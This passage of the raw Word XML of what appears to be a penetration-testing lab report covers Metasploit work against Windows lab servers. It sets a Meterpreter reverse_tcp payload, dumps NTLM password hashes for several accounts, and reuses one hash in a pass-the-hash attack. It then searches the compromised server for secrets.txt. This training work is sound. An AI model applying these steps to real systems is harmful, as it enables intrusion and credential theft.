            <wp:docPr id="67496001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60013" name="Picture 1" descr="A screenshot of a computer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BE0A" w14:textId="77777777" w:rsidR="00F63A14" w:rsidRDefault="00F63A14" w:rsidP="00927D2C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="698F2073" w14:textId="77777777" w:rsidR="00401570" w:rsidRDefault="00401570" w:rsidP="0040157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>Set the payload to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Space Grotesk" w:hAnsi="Consolas"/>
          <w:color w:val="E0061F"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="C7CDD1" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Space Grotesk" w:hAnsi="Consolas"/>
          <w:color w:val="E0061F"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="C7CDD1" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Space Grotesk" w:hAnsi="Consolas"/>
          <w:color w:val="E0061F"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="C7CDD1" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Space Grotesk" w:hAnsi="Consolas"/>
          <w:color w:val="E0061F"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="C7CDD1" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> and confirm its options automatically configure properly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E250DA" w14:textId="77851731" w:rsidR="00927D2C" w:rsidRDefault="00927D2C" w:rsidP="00927D2C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00927D2C">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47D7A31E" wp14:editId="0F2CCF7E">
            <wp:extent cx="5943600" cy="491490"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="777789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7895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D41D" w14:textId="77777777" w:rsidR="00401570" w:rsidRDefault="00401570" w:rsidP="0040157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>Run the exploit. If everything works, you will be dropped into a Meterpreter shell on the target system. If not, test it against the other Windows target. If neither exploit works, double-check your options (check for typos in IP addresses, usernames, passwords, etc.) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF58D37" w14:textId="77777777" w:rsidR="00F63A14" w:rsidRDefault="00F63A14" w:rsidP="00F63A14">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6963C2A0" w14:textId="3E4A7B8F" w:rsidR="00F63A14" w:rsidRDefault="00F63A14" w:rsidP="00F63A14">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63A14">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A72EF72" wp14:editId="072D292F">
            <wp:extent cx="5943600" cy="2832735"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="153890208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902084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68F82" w14:textId="77777777" w:rsidR="00F63A14" w:rsidRDefault="00F63A14" w:rsidP="00F63A14">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="154A393F" w14:textId="77777777" w:rsidR="0073176E" w:rsidRDefault="0073176E" w:rsidP="0073176E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="90" w:after="90"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Challenge 7: Passing the Hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B82E367" w14:textId="77777777" w:rsidR="0073176E" w:rsidRDefault="0073176E" w:rsidP="0073176E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>With one Windows machine down and one left to go, we can try a Pass The Hash attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475AC521" w14:textId="77777777" w:rsidR="0073176E" w:rsidRDefault="0073176E" w:rsidP="0073176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>From your established Meterpreter session, perform a hash dump and save the results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AAB001" w14:textId="7D393E22" w:rsidR="0073176E" w:rsidRDefault="0073176E" w:rsidP="0073176E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073176E">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18119291" wp14:editId="0BE3E097">
            <wp:extent cx="5943600" cy="919480"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1910882352" name="Picture 1" descr="A black background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82352" name="Picture 1" descr="A black background with numbers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214BA" w14:textId="77777777" w:rsidR="0073176E" w:rsidRDefault="0073176E" w:rsidP="0073176E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ED2C63A" w14:textId="77777777" w:rsidR="0073176E" w:rsidRPr="009A29B2" w:rsidRDefault="0073176E" w:rsidP="0073176E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A29B2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Administrator:500:aad3b435b51404eeaad3b435b51404ee:aa0969ce61a2e254b7fb2a44e1d5ae7a:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070B8D98" w14:textId="77777777" w:rsidR="0073176E" w:rsidRPr="009A29B2" w:rsidRDefault="0073176E" w:rsidP="0073176E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A29B2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Administrator2:1009:aad3b435b51404eeaad3b435b51404ee:e1342bfae5fb061c12a02caf21d3b5ab:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6143B09F" w14:textId="77777777" w:rsidR="0073176E" w:rsidRPr="009A29B2" w:rsidRDefault="0073176E" w:rsidP="0073176E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A29B2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDBAAA3" w14:textId="77777777" w:rsidR="0073176E" w:rsidRPr="009A29B2" w:rsidRDefault="0073176E" w:rsidP="0073176E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A29B2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>fstack:1008:aad3b435b51404eeaad3b435b51404ee:0cc79cd5401055d4732c9ac4c8e0cfed:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128475BA" w14:textId="122E181E" w:rsidR="0073176E" w:rsidRDefault="0073176E" w:rsidP="0073176E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A29B2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00494D3F" w14:textId="77777777" w:rsidR="0073176E" w:rsidRDefault="0073176E" w:rsidP="0073176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lastRenderedPageBreak/>
        <w:t>Exit (or background) your Meterpreter session to get back into the main Metasploit console.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DA5C40" w14:textId="0429DD3F" w:rsidR="0073176E" w:rsidRDefault="0073176E" w:rsidP="0073176E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073176E">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="551966D8" wp14:editId="29ABC33E">
            <wp:extent cx="5943600" cy="1175385"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1545826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2638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51D97" w14:textId="77777777" w:rsidR="0073176E" w:rsidRDefault="0073176E" w:rsidP="0073176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>Using the same exploit and payload modules, set your RHOSTS target to the remaining Windows server IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B01A59" w14:textId="77777777" w:rsidR="00E61E59" w:rsidRDefault="00E61E59" w:rsidP="00E61E59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2190"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00336374">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Set RHOSTS </w:t>
      </w:r>
      <w:r w:rsidRPr="00336374">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>172.31.59.127</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349DB1BA" w14:textId="6D78D840" w:rsidR="00E61E59" w:rsidRPr="00DF2FD7" w:rsidRDefault="00E61E59" w:rsidP="00E61E59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2190"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E61E59">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato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500CEE72" wp14:editId="7B9F964F">
            <wp:extent cx="5943600" cy="2221230"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="2051835758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835758" name="Picture 1" descr="A computer screen shot of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021A" w14:textId="5BEF7849" w:rsidR="00E61E59" w:rsidRDefault="00E61E59" w:rsidP="00E61E59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="356422E4" w14:textId="77777777" w:rsidR="0073176E" w:rsidRDefault="0073176E" w:rsidP="0073176E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05ECEA13" w14:textId="77777777" w:rsidR="0073176E" w:rsidRDefault="0073176E" w:rsidP="0073176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>Test each username and hash combination you found on the first Windows server until you gain a Meterpreter on the final server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD9C330" w14:textId="77777777" w:rsidR="009A29B2" w:rsidRDefault="009A29B2" w:rsidP="009A29B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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="605DD21F" w14:textId="636409D3" w:rsidR="009A29B2" w:rsidRPr="009A29B2" w:rsidRDefault="009A29B2" w:rsidP="009A29B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24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A29B2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A29B2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SMBUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A29B2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Administrator2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA461E1" w14:textId="77777777" w:rsidR="009A29B2" w:rsidRPr="009A29B2" w:rsidRDefault="009A29B2" w:rsidP="009A29B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24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A52D34B" w14:textId="77777777" w:rsidR="009A29B2" w:rsidRPr="009A29B2" w:rsidRDefault="009A29B2" w:rsidP="009A29B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Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A29B2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A29B2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SMBPass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A29B2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato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Pr="009A29B2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>aad3b435b51404eeaad3b435b51404ee:e1342bfae5fb061c12a02caf21d3b5ab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6AE18D" w14:textId="77777777" w:rsidR="00962BF6" w:rsidRDefault="00962BF6" w:rsidP="00962BF6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CD27ECB" w14:textId="77777777" w:rsidR="00F63A14" w:rsidRDefault="00F63A14" w:rsidP="00F63A14">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="463E8100" w14:textId="77777777" w:rsidR="00962BF6" w:rsidRPr="00962BF6" w:rsidRDefault="00962BF6" w:rsidP="00962BF6">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00962BF6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Challenge 8: Finding Sensitive Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E7B8B6" w14:textId="77777777" w:rsidR="00962BF6" w:rsidRPr="00962BF6" w:rsidRDefault="00962BF6" w:rsidP="00962BF6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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00962BF6">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">With access gained on the final target server, the last step is to grab the flag and claim victory. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A6048B" w14:textId="77777777" w:rsidR="00962BF6" w:rsidRPr="00962BF6" w:rsidRDefault="00962BF6" w:rsidP="00962BF6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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16092DF4" w14:textId="77777777" w:rsidR="00962BF6" w:rsidRDefault="00962BF6" w:rsidP="00962BF6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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00962BF6">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using your Meterpreter shell, search the target server for a file named secrets.txt .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645C65AA" w14:textId="77777777" w:rsidR="00962BF6" w:rsidRDefault="00962BF6" w:rsidP="00962BF6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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07E58318" w14:textId="28DB9E92" w:rsidR="00962BF6" w:rsidRPr="00336374" w:rsidRDefault="00962BF6" w:rsidP="00962BF6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24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00336374">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36977645" w14:textId="6F59716F" w:rsidR="00962BF6" w:rsidRPr="00336374" w:rsidRDefault="00962BF6" w:rsidP="00962BF6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24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00336374">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dir “\secrets.txt*” /s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B47D174" w14:textId="7540A470" w:rsidR="00962BF6" w:rsidRDefault="00962BF6" w:rsidP="00962BF6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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00336374">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CD:\Windows\debug\secrets.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51375787" w14:textId="68635054" w:rsidR="00962BF6" w:rsidRPr="00962BF6" w:rsidRDefault="00962BF6" w:rsidP="00962BF6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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00962BF6">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato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450D96AF" wp14:editId="6E0DC6BD">
            <wp:extent cx="5020376" cy="2657846"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="262146455" name="Picture 1" descr="A computer screen shot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146455" name="Picture 1" descr="A computer screen shot of white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9ADE" w14:textId="77777777" w:rsidR="00962BF6" w:rsidRDefault="00962BF6" w:rsidP="00962BF6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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00962BF6">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Read the contents of the file, and include them in your report.</w:t>
      </w:r>
    </w:p>
